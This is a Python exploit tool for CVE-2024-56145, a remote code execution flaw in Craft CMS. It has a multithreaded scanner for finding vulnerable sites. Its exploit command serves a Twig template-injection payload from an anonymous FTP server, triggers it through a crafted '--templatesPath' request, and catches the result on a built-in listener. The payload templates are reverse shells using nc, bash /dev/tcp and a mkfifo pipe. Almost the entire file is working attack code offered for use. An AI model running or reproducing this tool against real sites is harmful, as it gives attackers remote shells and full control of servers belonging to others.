import os import sys import uuid import select import socket import warnings import requests import threading import rich_click as click from rich.console import Console from alive_progress import alive_bar from pyftpdlib.servers import FTPServer from pyftpdlib.handlers import FTPHandler from pyftpdlib.authorizers import DummyAuthorizer from concurrent.futures import ThreadPoolExecutor console = Console() requests.packages.urllib3.disable_warnings() warnings.filterwarnings( "ignore", category=RuntimeWarning, module="pyftpdlib.authorizers" ) @click.group(context_settings=dict(help_option_names=["-h", "--help"])) def cli(): """ CVE-2024-56145 Exploit Framework Exploits a Remote Code Execution (RCE) vulnerability in Craft CMS. Thanks to Assetnote for their research and findings: https://www.assetnote.io/resources/research/how-an-obscure-php-footgun-led-to-rce-in-craft-cms This tool provides commands to: - Check if a target is vulnerable. - Exploit the vulnerability using a crafted FTP server and listener. """ pass @cli.command() @click.option("-u", "--url", required=False, help="The target URL for checking") @click.option( "-f", "--file", required=False, type=click.Path(exists=True), help="File containing a list of URLs", ) @click.option( "-t", "--threads", default=50, type=int, help="Number of concurrent threads" ) @click.option( "-o", "--output", required=False, type=click.Path(), help="Output file to save results", ) def check(url, file, threads, output): if not (url or file): console.print( "[bold red]You must specify either a URL or a file containing URLs.[/bold red]" ) return targets = ([url] if url else []) + ( [line.strip() for line in open(file, "r") if line.strip()] if file else [] ) with alive_bar( len(targets), title="Checking Targets", bar="smooth", enrich_print=False ) as bar: writer = open(output, "a").write if output else None lock = threading.Lock() def process_target(target): with lock: bar() result = check_target(target) with lock: writer(f"{result}\n") with ThreadPoolExecutor(max_workers=threads) as executor: executor.map(process_target, targets) if output: writer.__self__.close() def check_target(target): nonce = str(uuid.uuid4()) try: response = requests.get( f"{target}?--configPath=/{nonce}", verify=False, timeout=2 ) if "mkdir()" in response.text and nonce in response.text: console.print(f"[bold green]{target} is vulnerable![/bold green]") return f"{target} | VULNERABLE" console.print(f"[bold yellow]{target} is not vulnerable.[/bold yellow]") return f"{target} | NOT VULNERABLE" except Exception as e: console.print(f"[bold red]Failed to check {target}: {e}[/bold red]") return f"{target} | ERROR" @cli.command() @click.option("-fh", "--ftp-host", default="127.0.0.1", help="The FTP server host") @click.option("-fp", "--ftp-port", default=2121, type=int, help="The FTP server port") @click.option("-u", "--url", required=True, help="The target URL for exploitation") @click.option( "-lh", "--lhost", required=True, help="The local host for reverse shell listener" ) @click.option( "-lp", "--lport", required=True, type=int, help="The local port for reverse shell listener", ) @click.option( "-px", "--payload", default="bash", type=click.Choice(["nc", "bash", "mkfifo"]), help="Payload type to use", ) def exploit(ftp_host, ftp_port, url, lhost, lport, payload): payload_str = generate_payload(payload, lhost, lport) root_dir = "./virtual" create_virtual_files(root_dir, payload_str) threading.Thread( target=start_ftp_server, args=(ftp_host, ftp_port, root_dir), daemon=True ).start() threading.Thread(target=start_listener, args=(lhost, lport), daemon=True).start() console.print("[bold green]FTP server and listener started[/bold green]") trigger_http_request(url, ftp_host, ftp_port) def generate_payload(payload_type, lhost, lport): payload_templates = { "nc": f"nc -e /bin/bash {lhost} {lport}", "bash": f'bash -c "bash -i >& /dev/tcp/{lhost}/{lport} 0>&1"', "mkfifo": f"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc {lhost} {lport} >/tmp/f", } payload = f"{{{{ ['system', '{payload_templates[payload_type]}'] | sort('call_user_func') }}}}" console.print(f"[bold yellow]Payload generated:[/bold yellow] {payload}") return payload def create_virtual_files(root_dir, payload): try: os.makedirs(f"{root_dir}/default", exist_ok=True) with open(f"{root_dir}/default/index.twig", "w") as twig_file: twig_file.write(payload) with open(f"{root_dir}/default/index.html", "w") as html_file: html_file.write(payload) console.print("[bold green]Virtual files created successfully.[/bold green]") except Exception as e: console.print(f"[bold red]Failed to create virtual files:[/bold red] {e}") def start_ftp_server(host, port, root_dir): authorizer = DummyAuthorizer() authorizer.add_anonymous(root_dir, perm="elradfmw") handler = FTPHandler handler.authorizer = authorizer server = FTPServer((host, port), handler) console.print(f"[bold green]FTP server running on {host}:{port}[bold green]") try: server.serve_forever() except Exception as e: console.print(f"[bold red]Error starting FTP server:[/bold red] {e}") def trigger_http_request(url, ftp_host, ftp_port): templates_path = f"ftp://{ftp_host}:{ftp_port}" console.print( f"[bold yellow]Sending request to {url} with templatesPath={templates_path}[bold yellow]" ) try: response = requests.get(f"{url}?--templatesPath={templates_path}", verify=False) if response.status_code == 200: console.print( "[bold green]Payload triggered successfully. Check your listener for a session.[/bold green]" ) else: console.print( f"[bold red]Failed to trigger payload. HTTP Status:[/bold red] {response.status_code}" ) except Exception as e: console.print(f"[bold red]Failed to send HTTP request:[/bold red] {e}") def start_listener(lhost, lport, timeout=30): console.print(f"[bold cyan]Starting listener on {lhost}:{lport}[bold cyan]") s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.bind((lhost, lport)) s.listen(1) s.settimeout(timeout) try: console.print( f"[bold yellow]Waiting for connection... (Timeout: {timeout}s)[/bold yellow]" ) conn, addr = s.accept() console.print( f"[bold green]Connection received from {addr[0]}:{addr[1]}[bold green]" ) conn.setblocking(0) while True: ready, _, _ = select.select([conn, sys.stdin], [], []) if conn in ready: data = conn.recv(4096).decode(errors="ignore") if not data: break sys.stdout.write(data) sys.stdout.flush() if sys.stdin in ready: command = sys.stdin.readline().strip() conn.sendall((command + "\n").encode()) except socket.timeout: console.print( f"[bold red]No connection received within {timeout} seconds.[/bold red]" ) except KeyboardInterrupt: console.print("[bold cyan]\nListener stopped by user.[/bold cyan]") except Exception as e: console.print(f"[bold red]Error: {e}[bold red]") finally: conn.close() s.close() console.print("[bold cyan]Listener closed.[/bold cyan]") if __name__ == "__main__": cli()